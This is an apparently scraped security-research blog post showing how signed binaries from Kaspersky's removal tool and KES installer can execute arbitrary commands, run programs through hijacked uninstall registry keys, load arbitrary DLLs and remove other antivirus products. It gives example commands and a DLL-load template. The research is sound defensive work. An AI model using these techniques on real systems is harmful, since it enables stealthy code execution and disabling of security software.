LOLBINed — Using Kaspersky Endpoint Security “KES” Installer to Execute Arbitrary Commands

Kaspersky Logo

Introduction

kavremover

Kavremover Process Monitor
“actA7A1.tmp”
"C:\Users\lab\AppData\Local\Temp\actA7A1.tmp" run run-cmd "regsvr32.exe /u /s \"C:\Program Files (x86)\Kaspersky Lab\Kaspersky Endpoint Security for Windows\mcou.dll\""
RT_RCDATA503.exe run run-cmd "cmd /c whoami > whoami.txt"
Execution

Kaspersky Endpoint Security (KES) Installer

KES Prompt
  • cleaner.cab
  • incompatible.txt
incomptabile.txt
cleaner.cab

Hey, I Don’t Like Your AV…Can I Remove It

  • avg_free_av_2015_x64.ini
  • avg_free_av_2015_x86.ini
Content of “avg_free_av_2015_x64.ini”
detect-registry=HKEY_LOCAL_MACHINE\SOFTWARE\Avg\Avg2015....type=uninstall....env-registry=HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\AVG\UninstallString->UninstallString
  • Remove AVG from the system
  • Create registry key “HKEY_LOCAL_MACHINE\SOFTWARE\Avg\Avg2015”
  • Create registry key “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\AVG\UninstallString” and point it at “notepad.exe”
Uninstall String
  • Run KES installer and see if notepad is spawned
Notepad executed

Do You Have This AV Installed?

Detect Security Products

Back to The “cleanapi.exe” Binary

Arbitrary DLL Load

"C:\Users\lab\AppData\Local\Temp\282527F5EDA44439AD3CC23FD270EE91\clr\flt\cleanapi.exe" -r -t 1 -n cleanapi.dll -d C:\Users\lab\AppData\Local\Temp\282527F5EDA44439AD3CC23FD270EE91\clr\flt\
cleanapi.exe -n malware.dll 
cleanapi.exe looking for malware.dll
Signed “cleanapi.exe”

Conclusion

  • We can use the signed binaries extracted from “kavremover.exe” or “cleanapi.dll” to execute arbitrary commands.
ExtractedBinary.exe run run-cmd [Command]
  • We can execute arbitrary commands from the context of the KES installer using the registry (or any installation method described in the INI files in theory) as described above.
  • You can “remove”/“detect” more than “2400” security products using Kaspersky Endpoint Security “KES” installer.
  • We can call arbitrary DLLs using the “cleanapi.exe” binary using the following command.
cleanapi.exe -n [MaliciousDLL]

--

--

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
Nasreddine Bencherchali

I write about #ThreatHunting #WindowsInternals #Malware #DFIR and occasionally #Python.